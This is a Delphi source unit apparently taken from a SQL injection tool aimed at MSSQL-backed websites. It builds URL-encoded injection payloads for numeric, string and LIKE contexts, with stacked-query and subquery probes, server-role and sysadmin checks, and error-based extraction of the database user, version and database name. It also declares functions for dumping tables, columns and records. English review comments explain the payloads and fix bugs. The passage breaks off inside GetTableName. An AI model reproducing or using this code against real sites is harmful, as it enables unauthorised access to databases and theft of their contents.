unit CJdatabase_unit;
interface
uses
Windows,Messages,SysUtils,Variants, Classes, Graphics, Controls, Forms,Dialogs;
//function GetHttpHead(str_url:string):string;
function GetQuery(str_url:string):string; //找出关键字
function CanMulticase(str_url :string;sContent:string):boolean;
function CanSubquery(str_url:string;sContent:string):boolean;
function GetUserPower(str_url:string;sContent:string):string;
function GetUserPowerEx(str_url:string;sContent:string):string;
function GetUser(str_url:string):string;
function GetSQL_Version(str_url: string): string;
function GetDbName(str_url: string): string;
function GetRecordCount(str_url,TableName:string):string;
function GetRecordCountByDb(str_url,str_db,TableName:string):string;
function GetUserTableCount(str_url:string):integer;
function GetTableName(str_url:string;iTop:integer):string;
function GetTableNameByDb(str_url:string;str_db:string;iTop:integer):string;
function GetTableNameID(str_url:string;TableName:string):string;
function GetColumName(str_url:string;iTop:integer;TableName:string):string;
function GetColumNameByDb(str_url:string;iTop:integer;DbName:string;TableName:string):string;
function GetColumnCount(str_url:string;TableName:string):integer;
function GetColumnCountByDb(str_url:string;str_db:string;TableName:string):integer;
function GetColumType(str_url:string;CName:string;TableName:string):string;
function GetData(str_url:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
function GetDataByDb(str_url:string;DbName:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
function GetDatabaseName(str_url:string;iTop:integer):string;
function GetDatabaseCount(str_url:string):integer;
function Inject_method(str_url:string):integer;
function Inject_method_ByKeyWord(str_url:string;KeyWord:string):integer;
function Database_type_method(inject_methord:integer;str_url:string):integer;
function Database_type_method_ByKeyWord(inject_methord:integer;str_url:string;KeyWord:string):integer;
function a(max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string;btype:integer):boolean;
function GetTableCharLen(iTop:integer;URL:string;sContent:string):integer;
function b(min_num,max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string):integer;
function IfErrorReport(str_url:string):integer;
//*****************
function GetUserCharLen(str_url:string;sContent:string):integer;
function UserlenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
function UserCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
//*****************
function DBNameCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
function GetDBNameCharLen(str_url:string;sContent:string):integer;
function DBNamelenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
function DBCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer):boolean;
function GetDBCount(URL:string;sContent:string):integer;
function GetDBCharLen(iTop,iPos:integer;str_url:string;sContent:string):integer;
function DBCharLenB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string):integer;
function ColumnA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string):boolean;
function GetColumnLen(iTop,iPos:integer;str_url:string;sContent:string;tableName:string):integer;
function ColumnB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string;tableName:string):integer;
function ColumnCountB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string;tableName:string):integer;
function RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string;ColumnName:string;ColumnNames:TStringList):boolean;
//function RecordCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string):boolean;
function GetRecordCountEx(iTop,iPos:integer;str_url:string;sContent:string;tableName:string):integer;
function GetColumnLenEx(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
function GetColumnB(iTop,iPos:integer;str_url:string;sContent:string;tableName:string;ColumnName:string;ColumnNames:TStringList):integer;
function GetRecordCountList(str_url,TableName:string;inmethrord:integer):string;
function GetDataList(str_url:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList;injmethord:integer):string;
function FunTableExis(URL_source,TableName:string):Boolean;
function FunfieldExis(URL_source,TableName,FieldName:string):Boolean;
function CommonCheckStr(URL_check:string):boolean;
function CommonGetChar(URL_check:string;minv,maxv:integer):string;
var
Inject_methord:integer;
Database_methord:integer;
IferrReport:boolean;
implementation
uses
define_unit,Main_Unit,ThreadHttpGet;
//**********************************************************
// Function: probe whether the target accepts a subquery (MSSQL sysobjects probe; HTTP 200 is the only oracle)
function CanSubquery(str_url:string;sContent:string):boolean;
const
  // MSSQL-specific predicate that is true on any reachable instance; if the
  // page still answers 200 the subquery was accepted. sContent is accepted for
  // signature compatibility only and is not read.
  SUBQUERY_PROBE = '%20And%20(select%20count(1)%20from%20sysobjects)>1%20';
var
  probeURL: string;
begin
  // NOTE(review): unlike the sibling probes this one does not apply the
  // Inject_methord quoting variants, so it only fits a numeric context.
  probeURL := str_url + SUBQUERY_PROBE;
  // Status-code oracle: a 200 is read as "true". Applications that answer 200
  // for their error page will produce false positives here.
  Result := define_unit.GetURLCode(probeURL) = 200;
end;
//**********************************************************
// Function: probe whether the target accepts stacked (multi-statement) queries
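function CanMulticase(str_url :string;sContent:string):boolean;
const
  // Stacked-query probe: a statement terminator followed by a harmless DECLARE
  // and a line comment that swallows the rest of the original statement.
  MULTI_PROBE = ';declare%20@a%20int--';
var
  probeURL: string;
begin
  // Initialise first: the original left Result undefined when it exited early
  // on an unknown injection method, so callers could read garbage.
  Result := False;
  probeURL := '';
  case Inject_methord of
    0:
      begin
        Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
        Exit;
      end;
    1: probeURL := str_url + MULTI_PROBE;                      // numeric context
    2: probeURL := str_url + '''%20' + MULTI_PROBE;            // string context: close the quote first
    3: probeURL := str_url + '%25''%20' + '%20And%20''%25''=''' + MULTI_PROBE; // LIKE '%..%' context
  end;
  // Any other Inject_methord value falls through with an empty URL, as before.
  // Status-code oracle: 200 is read as "the stacked statement was accepted";
  // sites that answer 200 for error pages will yield false positives.
  Result := define_unit.GetURLCode(probeURL) = 200;
end;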
//**********************************************************
// Function: enumerate the server roles held by the database login (every entry of str_Power, then a db_owner/public fallback)
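function GetUserPowerEx(str_url:string;sContent:string):string;
// Returns the server roles the login holds as a '|'-separated list built from
// define_unit.str_Power, or 'db_owner' / 'public' when no server role matched.
// Each role is a separate boolean probe judged by the HTTP status alone
// (200 = true), so a site that answers 200 for error pages over-reports roles.
// sContent is not read.
var
  i: integer;
  power: string;
  str_ext: string;

  // Wrap a boolean predicate in the quoting the detected injection context
  // needs. Returns '' for Inject_methord values outside 1..3 (0 is rejected
  // before this is called), which matches the original's empty-URL request.
  function WrapProbe(const ext: string): string;
  begin
    case Inject_methord of
      1: Result := str_url + ext;                                      // numeric context
      2: Result := str_url + '''%20' + ext + '%20And%20''''=''';        // string context
      3: Result := str_url + '%25''%20' + ext + '%20And%20''%25''=''';  // LIKE '%..%' context
    else
      Result := '';
    end;
  end;

begin
  // Initialise first: the original left Result unassigned on its early-exit
  // paths, so a Delphi caller's variable could keep a stale value.
  Result := '';
  if str_url = '' then
  begin
    Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
    Exit;
  end;
  // Hoisted out of the loop: the method cannot change mid-loop and the
  // original showed this box and exited on the first iteration anyway.
  if Inject_methord = 0 then
  begin
    Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
    Exit;
  end;
  power := '';
  for i := 0 to High(define_unit.str_Power) do
  begin
    // IS_SRVROLEMEMBER returns 1 when the login is in the named server role.
    str_ext := '%20And%20Cast(IS_SRVROLEMEMBER(''' + str_Power[i] + ''')%20as%20int)=1';
    if define_unit.GetURLCode(WrapProbe(str_ext)) = 200 then
      power := power + define_unit.str_Power[i] + '|';
  end;
  if power = '' then
  begin
    // No server role: fall back to the database-level db_owner check.
    str_ext := '%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20int)=1';
    if define_unit.GetURLCode(WrapProbe(str_ext)) = 200 then
      power := 'db_owner'
    else
      power := 'public';
  end;
  Result := power;
end;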
//**********************************************************
// Function: check whether the database login is sysadmin ('SA'), with a db_owner/public fallback; only the first entry of str_Power is probed
function GetUserPower(str_url:string;sContent:string):string;
// Returns 'SA' when the sysadmin probe succeeds, otherwise 'db_owner' or
// 'public'. Despite the loop, only str_Power[0] is ever probed: the body
// breaks after its first iteration (see the break below). sContent is unused.
// The role probe is sent on a TThreadHttpGet worker; the db_owner fallback
// uses the synchronous define_unit.GetURLCode instead.
// NOTE(review): Result is never assigned on the Inject_methord=0 exit path,
// so a Delphi caller's variable may keep its previous value — confirm callers
// tolerate this.
var
i :integer;
power:string;
URL:string;
str_ext:string;
IdGetObj:TThreadHttpGet;
begin
for i:=0 to High(define_unit.str_Power) do
begin
// Boolean role probe; the varchar(1) cast is compared with an int, relying
// on SQL Server's implicit conversion.
str_ext:='%20And%20Cast(IS_SRVROLEMEMBER('''+str_Power[i]+''')%20as%20varchar(1))=1';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
// numeric context
URL:=str_url+str_ext;
end;
2: begin
// string context: close the quote, then re-balance it
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
// LIKE '%..%' context
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
// Worker is created suspended, given the URL, then started.
IdGetObj:=TThreadHttpGet.Create(true);
IdGetObj.FURL:=URL;
IdGetObj.Resume;
// NOTE(review): this busy-wait has no timeout. If the worker never sets
// Success (network failure, exception inside the thread) the UI loops here
// forever — presumably Success is set on both success and failure; verify
// in ThreadHttpGet.
while(not IdGetObj.Success) do
begin
application.ProcessMessages;
sleep(100);
end;
//if define_unit.GetURL(URL)=200 then
// Status-code oracle: 200 is read as "true".
if IdGetObj.iCode=200 then
begin
power:=power+define_unit.str_Power[i]+'|';
end;
// NOTE(review): a second Resume on an already-finished thread, followed by
// Free without Terminate/WaitFor. Check TThreadHttpGet's FreeOnTerminate
// setting — if it frees itself this is a double free.
IdGetObj.Resume;
IdGetObj.Free;
IdGetObj:=nil;
if pos('sysadmin',power)>0 then
begin
power:='SA';
end;
break; // only the first role (expected to be sysadmin) is checked
end;
if power='' then
begin
// Fallback: database-level db_owner membership, otherwise 'public'.
str_ext:='%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
if define_unit.GetURLCode(URL)=200 then
power:='db_owner'
else
power:='public';
end;
result:=power;
end;
//**********************************************************
// Function: retrieve the current database user via an error-based probe
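function GetUser(str_url:string):string;
// Returns the current database user extracted by define_unit.GetURLMsg from
// the server's conversion-error text, or '' when nothing could be extracted,
// the injection method is unknown, or the request raised.
var
  probeURL: string;
  str_ext: string;
begin
  // Initialise first: the original left Result unassigned on the early-exit
  // and exception paths, so a Delphi caller's variable could keep a stale
  // value (e.g. the user of the previous target).
  Result := '';
  probeURL := '';
  // Error-based probe: char(94)+user+char(94) yields '^name^'; comparing it
  // with an int forces a conversion error that echoes the name between the
  // carets. %2B is the URL encoding of '+'. (The original comment claimed
  // char(12) = '|'; the payload actually uses char(94) = '^'.)
  str_ext := '%20And%20char(94)%2Buser%2Bchar(94)=0';
  case Inject_methord of
    0:
      begin
        Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
        Exit;
      end;
    1: probeURL := str_url + str_ext;                                      // numeric context
    2: probeURL := str_url + '''%20' + str_ext + '%20And%20''''=''';        // string context
    3: probeURL := str_url + '%25''%20' + str_ext + '%20And%20''%25''=''';  // LIKE '%..%' context
  end;
  try
    // GetURLMsg is expected to return the text between the carets — confirm
    // in define_unit; '' means no error text was found.
    Result := define_unit.GetURLMsg(probeURL);
  except
    on E: Exception do
    begin
      Application.MessageBox(pchar('获取当前数据库的用户出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
      Result := '';
    end;
  end;
end;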
//**********************************************************
// Function: retrieve the SQL Server version string (@@version) via an error-based probe
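function GetSQL_Version(str_url: string): string;
// Returns the @@version text extracted by define_unit.GetURLMsg, the literal
// '未知版本' when the probe returned nothing, or '' when the URL is empty or
// the request raised.
var
  probeURL: string;
begin
  // Initialise first: the original left Result unassigned on the early-exit
  // and exception paths, so a Delphi caller's variable could keep a stale value.
  Result := '';
  if str_url = '' then
  begin
    Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
    Exit;
  end;
  // Error-based probe: '^'+@@version+'^' compared with an int forces a
  // conversion error whose message carries the version string.
  // NOTE(review): unlike GetUser/GetDbName the probe is appended as-is
  // (numeric context only). The Inject_methord quoting variants existed here
  // but were commented out by the author, so string-context targets may not
  // yield a version; the dead block has been dropped rather than re-enabled.
  probeURL := str_url + '%20And%20char(94)%2B@@version%2Bchar(94)>0';
  try
    Result := define_unit.GetURLMsg(probeURL);
    if Result = '' then
      Result := '未知版本';
  except
    on E: Exception do
      Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
  end;
end;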
//**********************************************************
// Function: retrieve the current database name (db_name()) via an error-based probe; also stores it in define_unit.FDbName
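function GetDbName(str_url: string): string;
// Returns the current database name extracted by define_unit.GetURLMsg from
// the server's conversion-error text and stores it in the shared global
// define_unit.FDbName. Returns '' when the injection method is unknown or the
// request raised (FDbName is left untouched in that case).
var
  probeURL: string;
  str_ext: string;
begin
  // Initialise first: the original left Result unassigned on the early-exit
  // and exception paths, so a Delphi caller's variable could keep a stale
  // value (e.g. the previous target's database name).
  Result := '';
  probeURL := '';
  // Error-based probe: '^'+db_name()+'^' compared with an int forces a
  // conversion error whose text carries the name between the carets.
  str_ext := '%20And%20char(94)%2Bdb_name()%2Bchar(94)=0';
  case Inject_methord of
    0:
      begin
        Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
        Exit;
      end;
    1: probeURL := str_url + str_ext;                                      // numeric context
    2: probeURL := str_url + '''%20' + str_ext + '%20And%20''''=''';        // string context
    3: probeURL := str_url + '%25''%20' + str_ext + '%20And%20''%25''=''';  // LIKE '%..%' context
  end;
  try
    // Side effect kept from the original: FDbName is a global that other
    // routines (e.g. GetTableName) also write.
    define_unit.FDbName := define_unit.GetURLMsg(probeURL);
    Result := define_unit.FDbName;
  except
    on E: Exception do
      Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
  end;
end;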
//**********************************************************
// Function: retrieve a table name from the target database (the database name is taken from the main form's edit box; body continues beyond this excerpt)
function GetTableName(str_url:string;iTop:integer):string;
var
str_ext:string;
URL:string;
begin
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
try